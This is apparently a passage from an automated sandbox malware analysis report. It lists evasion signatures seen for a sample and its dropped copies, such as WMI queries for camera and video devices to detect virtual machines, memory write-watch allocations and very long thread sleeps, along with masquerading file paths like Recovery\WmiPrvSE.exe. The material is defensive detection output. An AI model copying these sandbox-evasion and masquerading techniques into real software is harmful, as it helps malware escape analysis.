Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: CA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: 1A8D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 15A0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1AFC0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 31A0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1B380000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: AB0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 1A530000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 13E0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 1AED0000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1820000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1B310000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: E30000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1A920000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1520000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1AE70000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599719 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 597942 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595529 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 599562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597078
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596067
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595375
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 3600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 594234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592891
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591156
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589750
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589153
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588748
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588257
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588019
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587391
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587190
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586348
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585743
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585031
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584708
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583371
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582766
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582396
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 581172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579022
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578247
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 577641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576484
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576086
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575939
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575793
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575685
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575395
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575237
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575122
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574993
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574219
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574040
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573725
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573437
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572828
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572422
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572196
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571222
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570812
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570547
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 569516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568687
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568394
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568178
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568036
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567902
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567680
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566844
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566699
